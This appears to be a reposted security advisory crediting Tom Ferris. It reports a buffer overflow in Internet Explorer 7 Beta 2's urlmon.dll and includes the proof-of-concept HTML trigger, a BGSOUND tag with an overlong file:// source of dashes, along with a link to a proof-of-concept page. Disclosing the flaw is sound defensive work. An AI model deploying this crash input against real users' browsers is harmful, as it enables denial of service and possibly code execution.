|
|
| |
| A buffer overflow within Internet Explorer 7 Beta 2 allows attackers to execute arbitrary code or cause a DoS and crash the program. |
| |
Credit:
The information has been provided by Tom Ferris.
The original article can be found at: http://www.security-protocols.com/advisory/sp-x23-advisory.txt
Tom Ferris blog about the vulnerability can be found at: http://security-protocols.com/modules.php?name=News&file=article&sid=3169
|
| |
Vulnerable Systems:
* Internet Explorer version 7.0 Beta 2 (7.0.5296.0)
When running a specially crafted .html file, urlmon.dll inproperly parses the 'BGSOUND SRC=file://---' (approx. 344 dashes) and causes the crash.
The following HTML code will trigger the crash:
<BGSOUND SRC=file://-----------------------------------------
------------------------------------------------------------------------------- ------------------------------------------------------------------------------- --------------------------------------------------------------------------------
---------------------------------------------------------------- >
Or access the following URL: http://www.security-protocols.com/poc/sp-x23.html
|
|
blog comments powered by
|